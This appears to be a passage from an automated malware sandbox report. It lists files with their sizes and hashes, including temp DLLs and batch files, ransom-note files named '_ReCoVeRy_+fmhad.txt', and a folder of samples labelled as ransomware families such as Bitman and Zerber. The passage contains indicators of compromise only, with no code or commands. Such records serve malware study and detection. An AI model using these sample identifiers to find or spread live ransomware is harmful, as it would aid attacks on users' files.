                                                                                                                                        Filesize

                                                                                                                                        342B

                                                                                                                                        MD5

                                                                                                                                        4786777611fc9f237e291693552c620a

                                                                                                                                        SHA1

                                                                                                                                        76f24060ccc3ed8eba912b3186871a2978cf93a9

                                                                                                                                        SHA256

                                                                                                                                        9be4dad29dc59c0fd86e2643063f95fb06a17a3d7708c1aa96377f4da84c387e

                                                                                                                                        SHA512

                                                                                                                                        1ef76dbc1d8f99138c60682853da51dbe3941093337ea9cdcb7728c948b0600dc97f6d7feafa6902f6de8d0a7948176316e65ebdd460598ecc4cabd20a6d29cc

                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                        Filesize

                                                                                                                                        342B

                                                                                                                                        MD5

                                                                                                                                        41003db47355cbc76723f839d633e6bf

                                                                                                                                        SHA1

                                                                                                                                        2ee4e1713a1e61a44b41ad39b0566d8e440ba9ea

                                                                                                                                        SHA256

                                                                                                                                        8e49923e1aef5b906bdf49bff26ae35e3d0b91c54a15de0d0eca3fe9bfe2904e

                                                                                                                                        SHA512

                                                                                                                                        3231d120768d109c0b1739228cdb1a6276d067f461abd9f53c073b898dd7ce4f3b8ed2bb379eeb2fdcb190799c4bcb379f86d0674f5253310e7ca0b7cc575aa3

                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                        Filesize

                                                                                                                                        342B

                                                                                                                                        MD5

                                                                                                                                        609d4e5ed569cd01f8974576efc7427c

                                                                                                                                        SHA1

                                                                                                                                        183fef8ac7258377404ead197923b9b4b9a64035

                                                                                                                                        SHA256

                                                                                                                                        5680267ccded44214777fac85bcbbc0c72e4daa0e11ff028da1b6a434dfd64b8

                                                                                                                                        SHA512

                                                                                                                                        d3f3dc40f65d816aca26720fe61abda775e791b4d38b2ea1fc020e97e4d9b231a13a0514c624a2c561639ce8d53a259b271e802b2a8833d84d42d5ba2cc5c3b0

                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                        Filesize

                                                                                                                                        342B

                                                                                                                                        MD5

                                                                                                                                        3343d25810adc5d5bf80253c4c954be6

                                                                                                                                        SHA1

                                                                                                                                        053a22c3f9e2537ba2604a7161606c9dff0163cb

                                                                                                                                        SHA256

                                                                                                                                        89a9d85dd1d7383d54526309385e01a3a7e4965ed813ee973e43c51cc765b713

                                                                                                                                        SHA512

                                                                                                                                        ee520495f95adcdecf5625c9b834828e4720b3083ed4648a2daaa8112fa2cd340f320c917a431aea1a89416f50a52087e36d30e543b3ac80cc62d7ac1cceab29

                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                        Filesize

                                                                                                                                        342B

                                                                                                                                        MD5

                                                                                                                                        1802b48a997ba8004d3529afb50d69e7

                                                                                                                                        SHA1

                                                                                                                                        072e392e429bdabb82915c62f2b3b3180101cadc

                                                                                                                                        SHA256

                                                                                                                                        d2b5e5486f72ccd3f4ba5c116d863224a92c85b4accece14d83d5cd27f84c665

                                                                                                                                        SHA512

                                                                                                                                        469ed038ea7cf7da27422d315688660cd4eee22845227aad403e0958431fbcb19bf26204450fac3213e5639e119578ad307d042512ad7cbf660afad202ba43a2

                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                        Filesize

                                                                                                                                        342B

                                                                                                                                        MD5

                                                                                                                                        3595858bea8ed85d4f89cedf447f4a2f

                                                                                                                                        SHA1

                                                                                                                                        819c68545124fa0cd4768cc57a7ebc824c74d38d

                                                                                                                                        SHA256

                                                                                                                                        6f539261c8c63947dcede0810bef0d35b9b57bede9fa04402c990d056e5a132b

                                                                                                                                        SHA512

                                                                                                                                        0ab5d52f25a32bc4a2ca1a56ee6f53155634cd4a8d8a3db52caa3ff45b6940cdb5f045b4f0b0f81b73f66256817e3394fa854470b17dcbd9bf703d67f3c589f1

                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                        Filesize

                                                                                                                                        342B

                                                                                                                                        MD5

                                                                                                                                        59da4f36b1fd5d95601d36451591a0da

                                                                                                                                        SHA1

                                                                                                                                        8d2b126d7862978570dfd307fe9905270fb635db

                                                                                                                                        SHA256

                                                                                                                                        fccfce1c646f843b4087d75a4269aa97438748012be4b1697a0346cf48d8525d

                                                                                                                                        SHA512

                                                                                                                                        9f02ee41407be7a0f1a6cc87639de6909a4c89e2f7efaaf1667cdff05562d58917d5a8fbd55ff70c93d21428ca6077a809c5f0074c3b33406d20b4fa44263e5b

                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                        Filesize

                                                                                                                                        342B

                                                                                                                                        MD5

                                                                                                                                        3401c08150ab171a4aba9d61154ca6c0

                                                                                                                                        SHA1

                                                                                                                                        d47c729094a546b026a8a21038a20e66b349ea4f

                                                                                                                                        SHA256

                                                                                                                                        e10ef3374770e92897133938cd97c3dd00993c9c2e9f6ca0322f2bfa64cb39f8

                                                                                                                                        SHA512

                                                                                                                                        94f62cce77a6f1252d1c2887a692c766ee8be961078b3b897953bb9e871b85f79905f6db7216f37464caebbceb16bebdfcbb76e5ef6f6a344b9aefa2f52c98fa

                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                        Filesize

                                                                                                                                        342B

                                                                                                                                        MD5

                                                                                                                                        c694bc5db0655875f37579d6059fc6bd

                                                                                                                                        SHA1

                                                                                                                                        48d5a3af053849da6c0c2f24faed64a9559e2112

                                                                                                                                        SHA256

                                                                                                                                        a89d413f723686e62db5ec7796d77a6d1382f53702ae2f26d3cd9b863ab6258f

                                                                                                                                        SHA512

                                                                                                                                        cd1961618e688e1bc2bc23a5fc873bfe745ecc3dbf52e4100b8934c7a090dd9336fd5d9671d6e65f7e6cfb65f4930bcfccd1f3cfcf8440bb07cd33a679f92c11

                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                        Filesize

                                                                                                                                        342B

                                                                                                                                        MD5

                                                                                                                                        0a7541610ab8df73fc43c1b1f924de23

                                                                                                                                        SHA1

                                                                                                                                        b8d3871bdef153400eeedf78f7145a4c214eadba

                                                                                                                                        SHA256

                                                                                                                                        dddbdcabacd4822f1410bf3b682775135a66f00016d0244a63508aec59c5eab7

                                                                                                                                        SHA512

                                                                                                                                        153c39706d84e8246ca159002deecde37b2f12b19357a7d7ab3e516c1201a64bc7eebe5f5d71ed7b708b3227b3ea7fa14bec6cf1fc6320899fdd6468616f2cb8

                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                        Filesize

                                                                                                                                        342B

                                                                                                                                        MD5

                                                                                                                                        190f04055a873be640fede80c6c3b042

                                                                                                                                        SHA1

                                                                                                                                        42332a12758390ac148c2b24da1affb13b91acb3

                                                                                                                                        SHA256

                                                                                                                                        8d4e38c3ad4719b6e68350c961db1aacddfe62797be8f70250b3ea73f6731980

                                                                                                                                        SHA512

                                                                                                                                        53f3f28de787a90c2eaf443fa4c42cc8adc451213490be4d23fce73ab3181e7a4c039350da73f779bee1cd3df1933579da4bda5b0392252d88dadd1f3922e39e

                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                        Filesize

                                                                                                                                        342B

                                                                                                                                        MD5

                                                                                                                                        13b88a94bbf9b5cc615eea05cee0765b

                                                                                                                                        SHA1

                                                                                                                                        17a1d41ca8115aa7e9f33094d25a861cc2d390f8

                                                                                                                                        SHA256

                                                                                                                                        5673134c66bc5b41051bdce77ad64004114a4c664f5d96aa39d7cb3fe07923c8

                                                                                                                                        SHA512

                                                                                                                                        e8b53c5e3a343ed5fb1408081e6a95c31863d35bc16555c73179df2744fb6b38003b78024c91096c419fe352175cfccbfeaa3ddca6916ef4532247bb8eaee762

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\CabFBDF.tmp

                                                                                                                                        Filesize

                                                                                                                                        70KB

                                                                                                                                        MD5

                                                                                                                                        49aebf8cbd62d92ac215b2923fb1b9f5

                                                                                                                                        SHA1

                                                                                                                                        1723be06719828dda65ad804298d0431f6aff976

                                                                                                                                        SHA256

                                                                                                                                        b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                                                                                                                                        SHA512

                                                                                                                                        bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\System.dll

                                                                                                                                        Filesize

                                                                                                                                        11KB

                                                                                                                                        MD5

                                                                                                                                        883eff06ac96966270731e4e22817e11

                                                                                                                                        SHA1

                                                                                                                                        523c87c98236cbc04430e87ec19b977595092ac8

                                                                                                                                        SHA256

                                                                                                                                        44e5dfd551b38e886214bd6b9c8ee913c4c4d1f085a6575d97c3e892b925da82

                                                                                                                                        SHA512

                                                                                                                                        60333253342476911c84bbc1d9bf8a29f811207787fdd6107dce8d2b6e031669303f28133ffc811971ed7792087fe90fb1faabc0af4e91c298ba51e28109a390

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Tar100.tmp

                                                                                                                                        Filesize

                                                                                                                                        181KB

                                                                                                                                        MD5

                                                                                                                                        4ea6026cf93ec6338144661bf1202cd1

                                                                                                                                        SHA1

                                                                                                                                        a1dec9044f750ad887935a01430bf49322fbdcb7

                                                                                                                                        SHA256

                                                                                                                                        8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                                                                                                                                        SHA512

                                                                                                                                        6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\_3ED7.tmp.bat

                                                                                                                                        Filesize

                                                                                                                                        349B

                                                                                                                                        MD5

                                                                                                                                        ff97e670975227eb7180d3127795c8a6

                                                                                                                                        SHA1

                                                                                                                                        f022e59e77bedcd4980e2f028f8ec9af22b683c8

                                                                                                                                        SHA256

                                                                                                                                        88d7cba46ccd94557da19b2cad540bfba9a642ae00c75e5178797205ca3839ad

                                                                                                                                        SHA512

                                                                                                                                        378ed614fe554e577a90b9c3b8f853d7390b9ff3673d59a446d2f2c377ab0d58c1e5b63e160a129ca8697189076e2b92d169f6274b51101b25961e8bc7cbbba2

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\_9AF8.tmp.bat

                                                                                                                                        Filesize

                                                                                                                                        404B

                                                                                                                                        MD5

                                                                                                                                        2b5e3b8b9f06f7cf6a65e531a761bfea

                                                                                                                                        SHA1

                                                                                                                                        907548a9821115631ce53b1ab81a834d016bae86

                                                                                                                                        SHA256

                                                                                                                                        9e19e5bb3caee69f58ef4665a650963fe65f3c40926e0651348e4b6f97d37110

                                                                                                                                        SHA512

                                                                                                                                        b239016c65cf0d08fce6e26bc75282ef7274419af38e5f3a7a147d9690558dc22e50d2d19379ae4c96e3c5af916fc2fb6a05b3f1096345e1027bc0423c866301

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\freezers.dll

                                                                                                                                        Filesize

                                                                                                                                        72KB

                                                                                                                                        MD5

                                                                                                                                        c752300c1fc342b351fc6a2f7d0983ff

                                                                                                                                        SHA1

                                                                                                                                        0c2aee8f87d64c6e33b08c7a8a1b9067e6105d97

                                                                                                                                        SHA256

                                                                                                                                        e0cd14e8dbc426db7878669b017b632bc1e276af2c6536a84bb8ccfbf690c3fb

                                                                                                                                        SHA512

                                                                                                                                        a0ea8e43810a7f759dd52dfca6b4a73fa3fb4d136e32917b2d992fdad26016056f9e945755ead3e028d12dbee677ac6c831d76de7b84a2176fd30c0634a909b9

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsoAF05.tmp\IS.dll

                                                                                                                                        Filesize

                                                                                                                                        100KB

                                                                                                                                        MD5

                                                                                                                                        a7d92f7680550009f5aa98f538db694a

                                                                                                                                        SHA1

                                                                                                                                        9c390f0e25955eb62d1d74c792cb063bf0dc1d11

                                                                                                                                        SHA256

                                                                                                                                        03769cacc07e97206a7f669c36880c38eecfc26dac98ee45ed9c9c20866fe6c0

                                                                                                                                        SHA512

                                                                                                                                        2a703ab882e7fd343328c2112e09384d0a175aebc78f20c3a3115989d7f7994035a4c0ab45ca9cdddcc6fcae9dca752034003b8584d4af3c6ba4293d83639bb3

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsoAF05.tmp\KillProcDLL.dll

                                                                                                                                        Filesize

                                                                                                                                        37KB

                                                                                                                                        MD5

                                                                                                                                        e0cba97d6c9203b638fe94402106091b

                                                                                                                                        SHA1

                                                                                                                                        ba331d35ea9a19e0f5d228c8a0b6152cdb4c5c6b

                                                                                                                                        SHA256

                                                                                                                                        fb3004f3e89257c0e13b9fe4b641e5ffccac45aca0a09d0d96146cbbadb55b62

                                                                                                                                        SHA512

                                                                                                                                        7c12ab9704b6a9887dc12f09c03505721f2ee26fed621ca8ddee27e366795d36f61a0b5b6204374d9a4e6faea3c7dc82a29abc1b9b8723c9549af4ab2d8cfd7e

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsoAF05.tmp\System.dll

                                                                                                                                        Filesize

                                                                                                                                        11KB

                                                                                                                                        MD5

                                                                                                                                        bf712f32249029466fa86756f5546950

                                                                                                                                        SHA1

                                                                                                                                        75ac4dc4808ac148ddd78f6b89a51afbd4091c2e

                                                                                                                                        SHA256

                                                                                                                                        7851cb12fa4131f1fee5de390d650ef65cac561279f1cfe70ad16cc9780210af

                                                                                                                                        SHA512

                                                                                                                                        13f69959b28416e0b8811c962a49309dca3f048a165457051a28a3eb51377dcaf99a15e86d7eee8f867a9e25ecf8c44da370ac8f530eeae7b5252eaba64b96f4

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nszC228.tmp\System.dll

                                                                                                                                        Filesize

                                                                                                                                        11KB

                                                                                                                                        MD5

                                                                                                                                        a436db0c473a087eb61ff5c53c34ba27

                                                                                                                                        SHA1

                                                                                                                                        65ea67e424e75f5065132b539c8b2eda88aa0506

                                                                                                                                        SHA256

                                                                                                                                        75ed40311875312617d6711baed0be29fcaee71031ca27a8d308a72b15a51e49

                                                                                                                                        SHA512

                                                                                                                                        908f46a855480af6eacb2fb64de0e60b1e04bbb10b23992e2cf38a4cbebdcd7d3928c4c022d7ad9f7479265a8f426b93eef580afec95570e654c360d62f5e08d

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\~DF1E9A25E02CE63A0A.TMP

                                                                                                                                        Filesize

                                                                                                                                        16KB

                                                                                                                                        MD5

                                                                                                                                        37cf0f5c1448f048e2050af11ac38a53

                                                                                                                                        SHA1

                                                                                                                                        ba036c55a45f4f3856132259699e94826a50e20a

                                                                                                                                        SHA256

                                                                                                                                        5971052eae7e57456c4fc80829b3405531d248d12c4e85ac4ff2e7fec8621d4e

                                                                                                                                        SHA512

                                                                                                                                        479f1438d9906ed24e59e7a8359d4a5227be10536a096063f00b766d834b234cb8c0abcf2da4c8b8cd181d76afc6ded3363dd1cbdfcda0d1fd639d832046dc1b

                                                                                                                                      • C:\Users\Admin\AppData\Local\_ReCoVeRy_+fmhad.txt

                                                                                                                                        Filesize

                                                                                                                                        1KB

                                                                                                                                        MD5

                                                                                                                                        cfebfb72b21df10c8121b2996a0f66fa

                                                                                                                                        SHA1

                                                                                                                                        ffa4c492e9f3dc5cd960b10cb3b9b4079b0e023a

                                                                                                                                        SHA256

                                                                                                                                        21cbfc0d389e4fcb3550e2ff52e9b75347e46cba3d5be1c2f31ee8ff83229de9

                                                                                                                                        SHA512

                                                                                                                                        f6f47f2230f7e4a275f4b7bb3d3dd01dadc722f63213054c91f9947dc84ab9a524e331d010cd7f5378be8692423aebff713016426315bbc58f54870c6d335b13

                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\_ReCoVeRy_+fmhad.txt

                                                                                                                                        Filesize

                                                                                                                                        1KB

                                                                                                                                        MD5

                                                                                                                                        257b5c5ea60768d4f7ff63fc1e367afe

                                                                                                                                        SHA1

                                                                                                                                        69247768d5c1b982545cf6f6bdb860f049775624

                                                                                                                                        SHA256

                                                                                                                                        e9239c319b09d5c015abcbafa0423572f7e22e8c29576882604944b7d70087c7

                                                                                                                                        SHA512

                                                                                                                                        7b1b67d4f7f57dc4237522ac356d46cf6a1bfaf2a27c4d60ef0af07dc467c38f652950aa4bb25245e7336d98dac3cc515853ad7c1dbb5046a8d25b0b04e471b7

                                                                                                                                      • C:\Users\Admin\AppData\Roaming\agfxdrv.exe

                                                                                                                                        Filesize

                                                                                                                                        11KB

                                                                                                                                        MD5

                                                                                                                                        f208134246fc0e084bf3c221a7235b9e

                                                                                                                                        SHA1

                                                                                                                                        7bcd5a68be46d4be56b3b38ffe2edd449793d3f6

                                                                                                                                        SHA256

                                                                                                                                        c5de40c6c14e7a9ac7d20ef48c08d2ff00af6fb886e9387113c68e1ebd98412c

                                                                                                                                        SHA512

                                                                                                                                        6cae05792210f8222e3338e19b0f372e28582e7e3e7dfb3f5f543d4cf137462a09b7f343b4214e84a9eb532058bfea572a8ce1fe01a543834d33504ec01cc2b5

                                                                                                                                      • C:\Users\Admin\Desktop\00295\HEUR-Trojan-Ransom.Win32.Agent.gen-49e1a16ee8c68203aeb1870e7f73a1ad83434ef95afafe654e08dde6e687cc8e.exe

                                                                                                                                        Filesize

                                                                                                                                        143KB

                                                                                                                                        MD5

                                                                                                                                        4181762593fe73ba01f1797126a857ee

                                                                                                                                        SHA1

                                                                                                                                        d7e2fd23ebbcd151a56de54ea8b47c47b419b07e

                                                                                                                                        SHA256

                                                                                                                                        49e1a16ee8c68203aeb1870e7f73a1ad83434ef95afafe654e08dde6e687cc8e

                                                                                                                                        SHA512

                                                                                                                                        b66a0fc4fe35c624b09ba17e79c64ac2ca603dae270ea1c70a13e59d865ed3f4e535f27ea40653a9fe12a20ff9e86a270994d597f7cdb4460547b224c820017d

                                                                                                                                      • C:\Users\Admin\Desktop\00295\HEUR-Trojan-Ransom.Win32.Agent.gen-5f90978da18b59f9c9f15798b9f04457b3814b0b16017c81c870fd8b7cba2d4a.exe

                                                                                                                                        Filesize

                                                                                                                                        424KB

                                                                                                                                        MD5

                                                                                                                                        b23fa070c30dc9f4d3dc84139cf2768a

                                                                                                                                        SHA1

                                                                                                                                        0844890fa88cab2d267441ef9f26c82a4a33680d

                                                                                                                                        SHA256

                                                                                                                                        5f90978da18b59f9c9f15798b9f04457b3814b0b16017c81c870fd8b7cba2d4a

                                                                                                                                        SHA512

                                                                                                                                        74f69072650547f2c781d0c6f9518ce2abe1e7ed293bcff591b23338ad8bf4cc76bdaa61a961262cd5e80f34b898b240068f6da27b4b3ab954082fc3fa83953a

                                                                                                                                      • C:\Users\Admin\Desktop\00295\HEUR-Trojan-Ransom.Win32.Agent.gen-bebd3b1683b69a383af7689f70ad3e3992630e0fc07d98e2e014f4978136722a.exe

                                                                                                                                        Filesize

                                                                                                                                        195KB

                                                                                                                                        MD5

                                                                                                                                        a4a68c88f7eb1dffc3f88b9c46d4d171

                                                                                                                                        SHA1

                                                                                                                                        d66ed274796f19eceba82c12564064df8d2022ac

                                                                                                                                        SHA256

                                                                                                                                        bebd3b1683b69a383af7689f70ad3e3992630e0fc07d98e2e014f4978136722a

                                                                                                                                        SHA512

                                                                                                                                        9f75dfd772a1f98dedcf158d127195653280fdc585027118d1e608cebb1e3f3571169ae54f3e24a907660fcefa140217ac10ec67eb5baa9d7e480136fd220a56

                                                                                                                                      • C:\Users\Admin\Desktop\00295\HEUR-Trojan-Ransom.Win32.Blocker.gen-a741a3ffb090d88d5d11080ffe27d225542b2bad4863b846307385fe01359ec4.exe

                                                                                                                                        Filesize

                                                                                                                                        747KB

                                                                                                                                        MD5

                                                                                                                                        58d64fa0cf5086dd9489b6709c09f3a7

                                                                                                                                        SHA1

                                                                                                                                        dea524d765059e3c60cd48cbcf7075d48e3de0d3

                                                                                                                                        SHA256

                                                                                                                                        a741a3ffb090d88d5d11080ffe27d225542b2bad4863b846307385fe01359ec4

                                                                                                                                        SHA512

                                                                                                                                        d88cf3adf7585254fbc891e7f70b9b434ace56d80f781598e8fe2cb97d7ee8af108240c15d91bf7da5551664d21e306ee4ed162270ee4b1bdd5c8b75a859c387

                                                                                                                                      • C:\Users\Admin\Desktop\00295\HEUR-Trojan-Ransom.Win32.Foreign.vho-ec05a4debfd9351bdbf1152ae6d77127aa3d2446a9be2b225e5fa876f4908c90.exe

                                                                                                                                        Filesize

                                                                                                                                        388KB

                                                                                                                                        MD5

                                                                                                                                        d3cfd1fc9af8933b5eb985d5a6a346dc

                                                                                                                                        SHA1

                                                                                                                                        b4a09a551060f11eff9bcea71b87385ca0214b94

                                                                                                                                        SHA256

                                                                                                                                        ec05a4debfd9351bdbf1152ae6d77127aa3d2446a9be2b225e5fa876f4908c90

                                                                                                                                        SHA512

                                                                                                                                        8701d2b43384cc604297285b1b4a0c119ee77b385ac11b9767c7264985534889589798b974fe9b6ee50a5fdf771d882f67b2e034f7a2f3ab06dee426a9a92a0b

                                                                                                                                      • C:\Users\Admin\Desktop\00295\Trojan-Ransom.MSIL.Agent.gen-143af43e2ac557ae70d2bd508152614b1fc66bf15042c14c54b958ef89de53f1.exe

                                                                                                                                        Filesize

                                                                                                                                        208KB

                                                                                                                                        MD5

                                                                                                                                        26fc9c23c0de0c785708a7d703590b97

                                                                                                                                        SHA1

                                                                                                                                        10629a0b09e9f87d3a6fd0a9faf4ee737b4354e4

                                                                                                                                        SHA256

                                                                                                                                        143af43e2ac557ae70d2bd508152614b1fc66bf15042c14c54b958ef89de53f1

                                                                                                                                        SHA512

                                                                                                                                        c588d8b944e58b58ab9dd8194e25b6020b74b67fdfb2e4fd48fa66a1492028e1e775a7c8686b80eb834af32f6b6169e09af468b4a3e0df5a8f3494358ffc427c

                                                                                                                                      • C:\Users\Admin\Desktop\00295\Trojan-Ransom.MSIL.Agent.zl-5571432ff45e2249a78f042dcff636563940868b433e6b2bb1c641cf20af7c00.exe

                                                                                                                                        Filesize

                                                                                                                                        522KB

                                                                                                                                        MD5

                                                                                                                                        287b5fbdfcf4066bd3384f609c7e4bdd

                                                                                                                                        SHA1

                                                                                                                                        893b95bf219553d8c7f51c11597fde502489c6a8

                                                                                                                                        SHA256

                                                                                                                                        5571432ff45e2249a78f042dcff636563940868b433e6b2bb1c641cf20af7c00

                                                                                                                                        SHA512

                                                                                                                                        c82de6eabff9f598369a38803ff807f8df3cad40fd1985d6c195206a2db13c9de4467b36190639c66bc7a63e06a48fdfe0c62a7b62c945690cad25b9d2a9f7a6

                                                                                                                                      • C:\Users\Admin\Desktop\00295\Trojan-Ransom.NSIS.Zerber.fc-bc3accbe7907603fda971e111d4e1bbd681be84e7e8ff0acea74dfb067789e56.exe

                                                                                                                                        Filesize

                                                                                                                                        241KB

                                                                                                                                        MD5

                                                                                                                                        7ac2a5d95afbcde5ab21cc9bd89f9d74

                                                                                                                                        SHA1

                                                                                                                                        a071c3d4a2b2de941ead97e4fa1e568a6ea4d72a

                                                                                                                                        SHA256

                                                                                                                                        bc3accbe7907603fda971e111d4e1bbd681be84e7e8ff0acea74dfb067789e56

                                                                                                                                        SHA512

                                                                                                                                        c43f14a8f0dfadc8b95f106336a22f3725cbe509c12a531fd1b799fd91c67bd25aa4879a1c54de2cd2347a1d4c5c2953272602eb5794b680ed0a519ce4f1bf73

                                                                                                                                      • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Bitman.iue-b663a92eba8d3728f954d1aec633e573f75f441149a01a1678801629c0c52d6a.exe

                                                                                                                                        Filesize

                                                                                                                                        264KB

                                                                                                                                        MD5

                                                                                                                                        c61ecba5cba4402b6ec3f18f72ea65a3

                                                                                                                                        SHA1

                                                                                                                                        c2a4150a4d750f803aa252b41d8b3b5cb57d71f8

                                                                                                                                        SHA256

                                                                                                                                        b663a92eba8d3728f954d1aec633e573f75f441149a01a1678801629c0c52d6a

                                                                                                                                        SHA512

                                                                                                                                        37426c1baafc6e0adccc0205c69e6e998ca711488fe4a008ed7ff27f6b2c7614ef56aa844f4dc9c2eec1f85686a59e56b63e2e22c7b7de2897985130498587b1

                                                                                                                                      • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Bitman.jiv-9cbd2adc16e1a4a8d52eae645901650fc396e0d95a4fe9d56dd766ad5bb0b4a3.exe

                                                                                                                                        Filesize

                                                                                                                                        376KB

                                                                                                                                        MD5

                                                                                                                                        ebbf795385d1409700a7be2a675e544e

                                                                                                                                        SHA1

                                                                                                                                        ad07a0dc336416b6bf54d6eac5dbb755c9292bb7

                                                                                                                                        SHA256

                                                                                                                                        9cbd2adc16e1a4a8d52eae645901650fc396e0d95a4fe9d56dd766ad5bb0b4a3

                                                                                                                                        SHA512

                                                                                                                                        c209e5a8cb46fbf201a1891c2b4be9da8d62c5c01450bd658e48fdee675f170a5d56e2adf04737d0ffbe48b68aecedca46ac707378759ea9a05155bb1f3ed293

                                                                                                                                      • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Bitman.jzg-99ffdcce064f60505e305c5b19694c41031d0d91c59c23a61ed20cf68cc3af65.exe

                                                                                                                                        Filesize

                                                                                                                                        372KB

                                                                                                                                        MD5

                                                                                                                                        d67539c887392bb78afae787b47a630b

                                                                                                                                        SHA1

                                                                                                                                        563d75637eb539b72c2f1c23b588de4cb6ecdec5

                                                                                                                                        SHA256

                                                                                                                                        99ffdcce064f60505e305c5b19694c41031d0d91c59c23a61ed20cf68cc3af65

                                                                                                                                        SHA512

                                                                                                                                        7a1c7d1b0c6e860a13e89e24c1cb0e7188d8198a3a283abfa75d8ea56ebd35c48c8f48016734a620d2693d7e805c283d8fd0fcc490914410a40a56550883ac37

                                                                                                                                      • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Bitman.kdr-3eb005282668aeea30cbb9990cf27a796785829d887954fdc5e1f8497d781710.exe

                                                                                                                                        Filesize

                                                                                                                                        328KB

                                                                                                                                        MD5

                                                                                                                                        2b1a58eeb647b9d221ea9bbe1e4fda35

                                                                                                                                        SHA1

                                                                                                                                        dddd52a8c7301b5fa2798295bf8e5856229f484b

                                                                                                                                        SHA256

                                                                                                                                        3eb005282668aeea30cbb9990cf27a796785829d887954fdc5e1f8497d781710

                                                                                                                                        SHA512

                                                                                                                                        48c663c46167b171e3d5602c0eed03ed8b5e2eda9ad08dc80aee76ecf6920e4358097c8a9fd9272a8a26243175e5305b8715990f5b425005a21574a1b3e535a8

                                                                                                                                      • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Bitman.kmx-e25b2431aec847caed7f1b4f70d93e04ce4124adfd419c122bd50b84b4c3467e.exe

                                                                                                                                        Filesize

                                                                                                                                        384KB

                                                                                                                                        MD5

                                                                                                                                        429264c5f625ea249e52b610a9467793

                                                                                                                                        SHA1

                                                                                                                                        6683b48092231b1d4f478370f39086ae636a8814

                                                                                                                                        SHA256

                                                                                                                                        e25b2431aec847caed7f1b4f70d93e04ce4124adfd419c122bd50b84b4c3467e

                                                                                                                                        SHA512

                                                                                                                                        1ceb4de0745172c3305e4319e9b93469dc320b379b7a270be5d67cbe24b0fb0460cbc602ae7c9bb10e377cd5b70f6fec9b1f5be38a2afecdfcd2517e89d22048

                                                                                                                                      • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Bitman.qmf-53e13aa332a91eadf7c779cfba10ec1436da34b16a15b7636bcaa28526c11e5d.exe

                                                                                                                                        Filesize

                                                                                                                                        392KB

                                                                                                                                        MD5

                                                                                                                                        709eb5a8a6d092006ddfa23f2fa3ed0f

                                                                                                                                        SHA1

                                                                                                                                        2a7223a10d7e2cc1b5ab5c48d9f8f07c39201e98

                                                                                                                                        SHA256

                                                                                                                                        53e13aa332a91eadf7c779cfba10ec1436da34b16a15b7636bcaa28526c11e5d

                                                                                                                                        SHA512

                                                                                                                                        bc2ad43b1fd32f5c53d7922831d0ee01ef7dd0e311004b5d969986072cef4ac7a22de31944931cf9acba9082e8a6aa319138dcc32fd5ade83aa64cbdc3806e4c

                                                                                                                                      • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Bitman.qrz-62b12e760f3ca096fcb635acfcf74b8d35cb9621800cc63c0e8eb6058c5b6a31.exe

                                                                                                                                        Filesize

                                                                                                                                        312KB

                                                                                                                                        MD5

                                                                                                                                        d3c937349d6bb222656fe59f76c3c294

                                                                                                                                        SHA1

                                                                                                                                        7bedc3ed455eb124fc917058faf65c0afe0f3a8f

                                                                                                                                        SHA256

                                                                                                                                        62b12e760f3ca096fcb635acfcf74b8d35cb9621800cc63c0e8eb6058c5b6a31

                                                                                                                                        SHA512

                                                                                                                                        348bca6f5f759ef03ec5282ac301ff5c98fe8521f56ec02a12e71f1824ea88b72f8d2702863ef4e921e65e01523ce6b83bd92cd5fa4f00d4a25d3d6e2fb2da5f

